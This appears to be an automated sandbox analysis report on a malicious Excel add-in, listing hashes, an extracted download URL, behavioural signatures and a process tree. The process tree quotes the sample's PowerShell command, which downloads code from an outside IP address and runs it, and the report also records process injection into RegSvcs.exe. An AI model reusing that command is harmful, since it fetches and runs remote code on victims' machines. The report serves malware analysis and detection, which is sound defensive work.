Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-04-2021 20:10
Static task
static1
Behavioral task
behavioral1
Sample
Swift_Processing and monitoring.xlam
Resource
win7v20210408
General
-
Target
Swift_Processing and monitoring.xlam
-
Size
19KB
-
MD5
e776a82944a04d1939e9ce9916c30771
-
SHA1
080948c7533b52301fdaa5d3be8b04d58d24aa12
-
SHA256
aac964b49d6f12b420121a28b5c856e473695e00cb5095b862ea9c0db67ed119
-
SHA512
7c9eebbc93f362ec5173ca1a06c38a920c1cff240974bab882c451fbd08d9c6799dd7c0004f8463f6b4b133bb1beedcd1227fa91feead363272f555cc9852891
Malware Config
Extracted
http://179.43.140.150/shtq/fack.jpg
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exeWerFault.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3008 4000 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3760 4000 WerFault.exe EXCEL.EXE -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3760 created 4000 3760 WerFault.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 32 3008 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3008 set thread context of 2648 3008 powershell.exe RegSvcs.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3760 4000 WerFault.exe EXCEL.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4000 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
powershell.exeRegSvcs.exeWerFault.exepid process 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 3760 WerFault.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe 2648 RegSvcs.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
RegSvcs.exepid process 2648 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeRegSvcs.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 2648 RegSvcs.exe Token: SeDebugPrivilege 3760 WerFault.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE 4000 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
EXCEL.EXEpowershell.exedescription pid process target process PID 4000 wrote to memory of 3008 4000 EXCEL.EXE powershell.exe PID 4000 wrote to memory of 3008 4000 EXCEL.EXE powershell.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe PID 3008 wrote to memory of 2648 3008 powershell.exe RegSvcs.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift_Processing and monitoring.xlam"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://179.43.140.150/shtq/fack.jpg')"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4000 -s 40482⤵
- Process spawned unexpected child process
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2648-187-0x0000000005170000-0x000000000566E000-memory.dmpFilesize
5.0MB
-
memory/2648-186-0x0000000005170000-0x000000000566E000-memory.dmpFilesize
5.0MB
-
memory/2648-184-0x000000000041E792-mapping.dmp
-
memory/3008-180-0x0000000000000000-mapping.dmp
-
memory/3008-185-0x000001F3BF6B0000-0x000001F3BF6B1000-memory.dmpFilesize
4KB
-
memory/3008-183-0x000001F3BD806000-0x000001F3BD808000-memory.dmpFilesize
8KB
-
memory/3008-181-0x000001F3BD800000-0x000001F3BD802000-memory.dmpFilesize
8KB
-
memory/3008-182-0x000001F3BD803000-0x000001F3BD805000-memory.dmpFilesize
8KB
-
memory/4000-118-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmpFilesize
64KB
-
memory/4000-179-0x0000029C5E480000-0x0000029C5E484000-memory.dmpFilesize
16KB
-
memory/4000-123-0x0000029C4AAD0000-0x0000029C4C9C5000-memory.dmpFilesize
31.0MB
-
memory/4000-122-0x00007FFAA9DE0000-0x00007FFAAAECE000-memory.dmpFilesize
16.9MB
-
memory/4000-119-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmpFilesize
64KB
-
memory/4000-114-0x00007FF678D60000-0x00007FF67C316000-memory.dmpFilesize
53.7MB
-
memory/4000-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmpFilesize
64KB
-
memory/4000-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmpFilesize
64KB
-
memory/4000-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmpFilesize
64KB